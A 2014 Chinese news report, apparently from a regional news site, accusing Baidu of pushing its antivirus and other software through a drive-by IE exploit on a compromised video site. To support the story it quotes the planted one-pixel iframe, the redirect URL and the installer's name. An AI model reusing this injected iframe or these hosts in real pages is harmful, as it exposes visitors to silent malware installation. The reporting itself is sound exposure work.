杀毒软件形同病毒 百度利用IE漏洞流氓推广
2014-12-03 11:16:28 来源:it.hebei.com.cn 评论:0 点击:
漏洞是木马病毒入侵的一个主要通道,黑客利用漏洞在网站挂马,一旦有人访问电脑就会自动下载运行病毒。但令人震惊的是,竟有杀毒软件也在利用漏洞偷偷自动装入用户电脑。
据专业安全论坛卡饭网友曝光称,自己用XP电脑访问百度影音联盟网站时,电脑自动下载运行了百度杀毒、百度卫士、百度浏览器和百度输入法等一系列百度软件。经过分析,发现这是名为“百度有钱联盟”的安装包在利用IE漏洞植入电脑。

名为“雷帝因陀罗”网友表示,今天上网看片,搜到一个影音站,结果片子半天没有缓冲出来,电脑先卡得要死。没过一会儿,突然发现桌面右下角冒出几个图标,不知怎么就装上了百度杀毒、百度卫士之类的。
他第一反应就是这个网站有问题,赶紧查了下页面的源代码http://www.80ydw.com/movie/693.html,果然有处很可疑:<iframe src=http://hpa.pw/HHH width=1 height=1></iframe>,明显是被挂马了:
他进一步分析,http://hpa.pw/HHH这个页面会跳转到http://221.233.160.110/images/xml.html,懂行的一看都知道了,它就是利用微软11月刚补的IE漏洞挂马(该网友电脑是XP系统直接中招),挂的竟然是一个百度官方签名的安装包,下载地址也是在百度服务器!

再看百度利用IE漏洞偷偷安装的这个安装包,文件名是BaiduYouQianPartPackSilent_1.1.0.10_150946.exe(百度一键装机程序),大小竟然有144MB!当它利用漏洞自动下载执行后,会给电脑里装上百度杀毒、百度卫士、百度浏览器和百度输入法等一系列软件,难怪电脑都快卡死机了。

百度流氓推广使用的漏洞,在11月微软补丁日刚刚得到微软修复。但由于部分网民没有及时打补丁,再加上XP系统停止安全更新,此漏洞仍存在一定风险。
正如网友“雷帝因陀罗”所说,互联网公司流氓推广见得多了,但最多就是诱导性的弹窗,而百度所谓的杀毒软件,竟然像病毒一样攻击用户的系统漏洞,真是连底裤都不要了。
相关热词搜索:
上一篇:好得睐汤建英做客CCTV《影响力对话》
下一篇:2014杭州开元名都圣诞季·开跑!

评论排行
- ·河北医科大学第三医院邵德成擅自篡改伪...(451)
- ·中国当代名人书画院院士冯勇建(64)
- ·我们约会吧+ 陈文最新个人资料简介照片...(59)
- ·《山东临沭党校一女嫁二男为哪般》续一(18)
- ·圣象“新实木”地板遭起诉或赔200万元(11)
- ·九江仁爱医院黑幕 17岁少女普通人流两...(8)
- ·河北清河公安:一个被“休”了13年的听证会(7)
- ·百度360搜索大战蓄势待发 用户何去何从(6)
- ·陕西兴平一燃气管道企业存在安全隐患违...(6)
- ·武威:熏醋厂不明气体“熏”翻两员工 ...(6)
- ·从丝芙兰美国封杀中国用户风波,看到菩...(6)
- ·我们约会吧 耿玉茹最新个人资料简介照片(5)
- ·重庆一高级法院“审判意见”指导下级法...(4)
- ·开学在即 幼儿园为何莫名被拆(4)
- ·卡仙奴百分百识别骗子(4)
- · 励志!!毕业拒绝失业!!听创业者讲述...(4)
- ·我们约会吧+ 邸秋红最新个人资料简介照片(3)
- ·新西兰肉毒杆菌发酵 多美滋问题产品仍...(3)
- ·iPhone4S被盗还能不能找回,苹果手机丢...(3)
- ·陕西兴平两家天然气公司市场资源争夺的...(3)